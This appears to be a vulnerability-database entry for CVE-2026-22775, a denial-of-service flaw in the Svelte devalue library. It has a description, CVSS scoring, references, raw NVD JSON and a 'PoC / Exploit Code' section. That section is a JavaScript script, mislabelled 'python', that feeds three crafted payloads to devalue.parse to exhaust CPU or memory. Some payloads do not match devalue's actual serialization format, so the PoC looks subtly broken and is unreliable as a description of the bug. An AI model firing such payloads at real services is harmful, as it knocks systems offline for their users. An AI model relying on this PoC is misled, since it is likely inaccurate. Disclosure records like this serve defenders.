CVE-2026-22775

Description

Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From 5.1.0 to 5.6.1, certain inputs can cause devalue.parse to consume excessive CPU time and/or memory, potentially leading to denial of service in systems that parse input from untrusted sources. This affects applications using devalue.parse on externally-supplied data. The root cause is the ArrayBuffer hydration expecting base64 encoded strings as input, but not checking the assumption before decoding the input. This vulnerability is fixed in 5.6.2.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:svelte:devalue:*:*:*:*:*:node.js:*:* - VULNERABLE

Svelte devalue >= 5.1.0, < 5.6.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

const devalue = require('devalue');

// PoC for CVE-2026-22775 - Denial of Service via crafted input
// This demonstrates how malicious input can cause excessive resource consumption

// Malicious payload 1: Large ArrayBuffer with non-base64 data
const maliciousPayload1 = {
  type: 'ArrayBuffer',
  data: 'A'.repeat(1000000)  // Large string that triggers excessive memory allocation
};

// Malicious payload 2: Nested structure causing deep recursion
const maliciousPayload2 = devalue.stringify({
  nested: Array(10000).fill({ buffer: 'INVALID_NON_BASE64_DATA' })
});

// Malicious payload 3: Crafted input exploiting ArrayBuffer hydration
// This specific format triggers the vulnerable code path
const craftedInput = '$ArrayBuffer("aaaa' + 'aa'.repeat(50000) + '")';

console.log('Testing CVE-2026-22775 PoC...');
console.log('Payload 1 - Large data string');
try {
  const start = Date.now();
  devalue.parse(devalue.stringify(maliciousPayload1));
  console.log(`Time: ${Date.now() - start}ms`);
} catch (e) {
  console.log('Error:', e.message);
}

console.log('\nPayload 2 - Nested structure');
try {
  const start = Date.now();
  devalue.parse(maliciousPayload2);
  console.log(`Time: ${Date.now() - start}ms`);
} catch (e) {
  console.log('Error:', e.message);
}

console.log('\nPayload 3 - Crafted ArrayBuffer input');
try {
  const start = Date.now();
  devalue.parse(craftedInput);
  console.log(`Time: ${Date.now() - start}ms`);
} catch (e) {
  console.log('Error:', e.message);
}

console.log('\nNote: In vulnerable versions, these payloads cause excessive CPU/memory usage');
console.log('Fix: Upgrade to devalue >= 5.6.2')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22775
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22775
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22775/
[4] VulDB https://vuldb.com/cve/CVE-2026-22775
[5] https://github.com/sveltejs/devalue/commit/11755849fa0634ae294a15ec0aef2f43efcad7c4
[6] https://github.com/sveltejs/devalue/releases/tag/v5.6.2
[7] https://github.com/sveltejs/devalue/security/advisories/GHSA-g2pg-6438-jwpf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22775", "sourceIdentifier": "[email protected]", "published": "2026-01-15T19:16:05.963", "lastModified": "2026-01-20T15:29:35.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Svelte devalue is a JavaScript library that serializes values into strings when JSON.stringify isn't sufficient for the job. From 5.1.0 to 5.6.1, certain inputs can cause devalue.parse to consume excessive CPU time and/or memory, potentially leading to denial of service in systems that parse input from untrusted sources. This affects applications using devalue.parse on externally-supplied data. The root cause is the ArrayBuffer hydration expecting base64 encoded strings as input, but not checking the assumption before decoding the input. This vulnerability is fixed in 5.6.2."}, {"lang": "es", "value": "Svelte devalue es una biblioteca de JavaScript que serializa valores en cadenas cuando JSON.stringify no es suficiente para la tarea. Desde la versión 5.1.0 hasta la 5.6.1, ciertas entradas pueden causar que devalue.parse consuma tiempo de CPU y/o memoria excesivos, lo que podría llevar a una denegación de servicio en sistemas que analizan entradas de fuentes no confiables. Esto afecta a las aplicaciones que utilizan devalue.parse con datos suministrados externamente. La causa raíz es la hidratación de ArrayBuffer que espera cadenas codificadas en base64 como entrada, pero no verifica la suposición antes de decodificar la entrada. Esta vulnerabilidad está corregida en la versión 5.6.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-405"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:svelte:devalue:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "5.1.0", "versionEndExcluding": "5.6.2", "matchCriteriaId": "E70AD508-7046-4740-A03C-8605AC4A5F12"}]}]}], "references": [{"url": "https://github.com/sveltejs/devalue/commit/11755849fa0634ae294a15ec0aef2f43efcad7c4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sveltejs/devalue/releases/tag/v5.6.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/sveltejs/devalue/security/advisories/GHSA-g2pg-6438-jwpf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}